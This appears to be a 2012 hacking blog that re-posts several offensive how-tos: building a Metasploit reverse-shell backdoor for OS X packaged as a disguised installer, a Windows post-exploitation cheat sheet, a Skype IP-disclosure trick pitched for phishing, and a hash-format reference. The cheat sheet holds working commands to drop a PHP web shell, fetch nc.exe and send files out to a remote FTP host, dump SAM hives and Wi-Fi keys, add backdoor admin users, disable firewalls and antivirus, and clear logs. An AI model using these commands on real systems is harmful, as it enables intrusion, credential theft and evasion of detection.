Dec 1, 2012

Howto: Web shell in JSP,ASP,PHP By BruteLogic.



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hacking OSX using Metasploit

This post just a summary from the Source. If you want to get the whole things and picture of howto, please go to the Source.

1. Create backdoor file with Metasploit
- ./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
2.  Replacing the + at the end of file.
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
- echo "#include <stdio.h>" >> temp.c
- cat ready.c >> temp.c
- echo ";" >> temp.c
- echo "int main(void) { ((void (*)())micro)();" >> temp.c
- echo "}" >> temp.c
- mv temp.c final.c
- echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c
- rm -f temp2
- rm -f temp3
- rm -f temp4

3. Compile it with gcc
- gcc final.c -o OSXBin

4.  generate and obfuscate a Java meterpreter JAR file.
- ./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar


5. Obfuscation JAR file with ProGuard.(http://proguard.sourceforge.net/)

6. Create PKG file with Iceberg and edit install.sh similar this.
#!/bin/sh
/Applications/Utilities/OSXBin &
 
7.Setup listener for shell
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=192.168.168.100 LPORT=80  E 


8. Setup listen for JAR
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=192.168.168.100 LPORT=81  E
 
9. Install pkg and run Java
java -jar /Applications/Utilities/obfuscated.jar 
 
 

Source: http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 29, 2012

Howto: Autosaving malicious payload using Fiddler

If you want the detail, please go to the Source.

In fiddler, edit CustomRules.js file with this code:

static function onShutdown() {
        Fiddler.Application.UI.actSelectAll();
        var oSessions = Fiddler.Application.UI.GetSelectedSessions();
        for (var x=0; x< oSessions.Length; x++)
        {
                 if(oSessions[x].oResponse.headers.ExistsAndContains("Content-Type","application/java-archive"))
                 {
                           oSessions[x].SaveReponseBody();
                 }
        }   


Now when you close the app., it will automatic save file for you.

Source: http://jeromesecurityblog.wordpress.com/2012/11/28/saving-malicious-payload-using-fiddler/  


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 27, 2012

Types Of Hash(MD5)

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number '9'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number 'B'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]


SHA-1(Django) = sha1($salt.$pass)
Example: sha1$12345678$90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b
12345678 is salt (in the hexadecimal format)
90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b is SHA-1 hash.

SHA-256(Django) = SHA-256($salt.$pass)
Example: sha256$12345678$154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b
12345678 is salt (in the hexadecimal format)
154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b is SHA-256 hash.

SHA-384(Django) = SHA-384($salt.$pass)
Example: sha384$12345678$c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5
12345678 is salt (in the hexadecimal format)
c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5 is SHA-384 hash.

SHA-1(ManGOS) = sha1(strtoupper($username).':'.$pass)

SHA-1(ManGOS2) = sha1($username.':'.$pass) 
 


-------------------------------------------------
Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the "Hash" column - the program will automatically extract the salt and other required data from it.

[3] The ':' character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a'4 instead of a\'4, as well as the salts a"4 instead of a\"4 and a\4 instead of a\\4.







Source: http://forum.insidepro.com/viewtopic.php?t=8225


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 26, 2012

Howto: Inject PHP Shell via SSH Log By Brute Logic



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Skype Passive IP Disclosure Vulnerability By SensePost

For those who haven't heard of it - this vulnerability allows an attacker to passively disclose victims external, as well as internal, IP addresses in a matter of seconds, by viewing the victims VCard through an 'Add Contact' form.
Why is this useful?
1. Verifying the identity and the location of the target contact. Great when performing geo-targeted phishing attacks.
2. Checking whether your Skype account has not been used elsewhere :)
3. Spear phishing enumeration while Pen Testing.
4. Just out of plain curiosity.
To get this working, following these basic steps:
1. Download and install the patched version of Skype 5.5 from here (the patch enables the Skype client to save the logs in non obfuscated form)
2. Save the lines below as a Skype_log_patch.reg reg file:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]
"LastLanguage"="en"
"Logging"="SkypeDebug2003"
"Logging2"="on"
Once saved, run it to enable the Skype Debug Log File. 4. Start Skype.
5. Search for any Skype contact and click on the 'Add a Skype Contact' button, but do not send the request, rather click on the user to view their VCard.
4. Open the log file (it should appear in the same folder as Skype executable e.g. debug-20121003-0150)

Source: http://www.sensepost.com/blog/7698.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Convert metasploit cachedump files to Hashcat format for cracking By Commandlinefu.com

 cd ~/.msf4/loot && cat *mscache* | cut -d '"' -f 2,4 | sed s/\"/\:/g | tr -cd '\11\12\40-\176' | grep -v Username | cut -d : -f 1,2 | awk -F':' '{print $2,$1}' | sed 's/ /:/g' > final.dcc.hash

Source: http://www.commandlinefu.com/commands/view/11574/convert-metasploit-cachedump-files-to-hashcat-format-for-cracking


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Manual Pentest Windows Cheatsheet by Stormsecurity

View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Update: Post Exploitation

Blind Files

(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s).
Files that will have the same name across networks / Windows domains / systems.
File
Expected Contents / Description
%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini
This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM
It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system

>insert new rows above this line<
SEE IMPORTANT FILES SECTION FOR MORE IDEAS


System

Command
Expected Output or Description
whoami
Lists your current user. Not present in all versions of Windows; however shall be present in Windows NT 6.0-6.1.
whoami /all
Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
set
Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
fsutil fsinfo drives
Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
curely registered executables within the system registry on Windows 7.


Networking (ipconfig, netstat, net)

Command
Expected Output or Description
ipconfig /all
Displays the full information about your NIC’s.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo

netstat -s -p [tcp|udp|icpm|ip]

netstat -r

netstat -na | findstr :445

netstat -nao | findstr LISTENING
XP and up for -o flag to get PIDnet acc
netstat -nao | findstr LISTENING
XP and up for -o flag to get PID
netstat -na | findstr LISTENING


netsh diag show all

net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain

net view /domain:otherdomain

net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can be different and superseded by the doaimn policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
nbtstat -a [ip here]

net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find / “\\”

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)


netsh wlan show profiles
shows all saved wireless profiles. You may then export the info for those profiles with the command below
netsh wlan export profile folder=. key=clear
exports a user wifi profile with the password in plaintext to an xml file in the current working directory
netsh wlan [start|stop] hostednetwork
Starts or stops a wireless backdoor on a windows 7 pc
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
Complete hosted network setup for creating a wireless backdoor on win 7
netsh wlan set hostednetwork mode=[allow|disallow]
enables or disables hosted network service
wmic ntdomain listRetrieve information about Domain and Domain Controller



  
  • http://www.securityaegis.com/ntsd-backdoor/

Configs

Command
Expected Output or Description
gpresult /z
Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc

sc query

sc queryex

type %WINDIR%\System32\drivers\etc\hosts
Print the contents of the Windows hosts file
j
Prints a directory listing of the Program Files directory.
echo %COMSPEC%
Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

c:\windows\system32\gathernetworkinfo.vbs        Included script with Windows7, enumerates                                 registry, firewall config, dns cache, etc.

Finding Important Files

Command
Description / Reason
tree C:\ /f /a > C:\output_of_tree.txt
Prints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a

dir /b /s [Directory or Filename]

dir \ /s /b | find /I “searchstring”
Searches the output of dir from the root of the drive current drive (\) and all sub drectories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing, for ‘searchstring’ anywhere in the file name or path.
command | find /c /v “”
Counts the lines of whatever you use for ‘command’


Files To Pull (if possible)

File location
Description / Reason
%SYSTEMDRIVE%\pagefile.sys
Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log

%WINDIR%\repair\sam

%WINDIR%\repair\system

%WINDIR%\repair\software

%WINDIR%\repair\security

%WINDIR%\iis6.log (5, 6 or 7)

%WINDIR%\system32\logfiles\httperr\httperr1.log
IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
IIS 7’s logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)

%WINDIR%\system32\config\AppEvent.Evt

%WINDIR%\system32\config\SecEvent.Evt

%WINDIR%\system32\config\default.sav

%WINDIR%\system32\config\security.sav

%WINDIR%\system32\config\software.sav

%WINDIR%\system32\config\system.sav

%WINDIR%\system32\CCM\logs\*.log

%USERPROFILE%\ntuser.dat

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

%WINDIR%\System32\drivers\etc\hosts

unattend.txt, unattend.xml, sysprep.inf
Used in the automated deployment of windows images and can contain user accounts. No known default location.



Remote System Access   

Command
Description / Reason
net share \\computername

tasklist /V /S computername

qwinsta /SERVER:computername

qprocess /SERVER:computername *

net use \\computername
This maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username password
Using the IPC$ mount use a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system.

This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable remote desktop.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
Enable remote assistance


  • net time \\computername (Shows the time of target computer)
  • dir \\computername\share_or_admin_share\   (dir list a remote directory)
  • tasklist /V /S computername
    • Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount


Auto-Start Directories


  • ver (Returns kernel version - like uname on *nix)
Windows NT 6.1, 6.0
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5,0
%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x
%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\


Binary Planting

Location / File name
Reason / Description
msiexec.exe
Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying pah,t you get code execution.
%SystemRoot%\System32\wbem\mof\
Taken from stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vuln
Check the $PATH environmental variableSome directories may be writable. See: https://www.htbridge.com/advisory/HTB23108


WMI


  • wmic bios

  • wmic qfe qfe get hotfixid

  •  (This gets patches IDs)

  • wmic startupwmic service
  • wmic process get caption,executablepath,commandline
  • wmic process call create “process_name” (executes a program)
  • wmic process where name=”process_name” call terminate (terminates program)
  • wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
  • wmic useraccount (usernames, sid, and various security related goodies)
  • wmic useraccount get /ALL
  • wmic share get /ALL (you can use ? for gets help ! )
  • wmic startup list full (this can be a huge list!!!)
  • wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

Reg Command exit


  • reg save HKLM\Security security.hive  (Save security hive to a file)
  • reg save HKLM\System system.hive (Save system hive to a file)
  • reg save HKLM\SAM sam.hive (Save sam to a file)=

  • reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
  • reg export [RegDomain]\[Key] [FileName]
  • reg import [FileName ]
  • reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

Deleting Logs


  • wevtutil el  (list logs)
  • wevtutil cl <LogName> (Clear specific lowbadming)
  • del %WINDIR%\*.log /a /s /q /f

Uninstalling Software “AntiVirus” (Non interactive)


  • wmic product get name /value (this gets software names)
  • wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)

# Other  (to be sorted)


  • pkgmgr usefull  /iu :”Package”
  • pkgmgr usefull  /iu :”TelnetServer” (Install Telnet Service ...)
  • pkgmgr /iu:”TelnetClient” (Client )
  • rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
  • wscript.exe <script js/vbs>
  • cscript.exe <script js/vbs/c#>
  • xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff
  • OS SPECIFICwmicWin2k3

  • winpop stat domainname

Vista/7


  • winstat features
  • wbadmin get status
  • wbadmin get items
  • gpresult /H gpols.htm
  • bcdedit /export <filename>

Vista SP1/7/2008/2008R2 (x86 & x64)


Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary

To list features which can be enabled/disabled:

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

To enable a feature (TFTP client for example):

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

To disable a feature (again TFTP client):

  • %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP

Invasive or Altering Commands

These commands change things on the target and can lead to getting detected
Command
Description
net user hacker hacker /add
Creats a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators /add hacker
or
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall
netsh firewall set opmode enable
Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.

Source: http://stormsecurity.wordpress.com/2012/06/05/manual-pentesting-cheatsheet-windows/
              https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit#




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |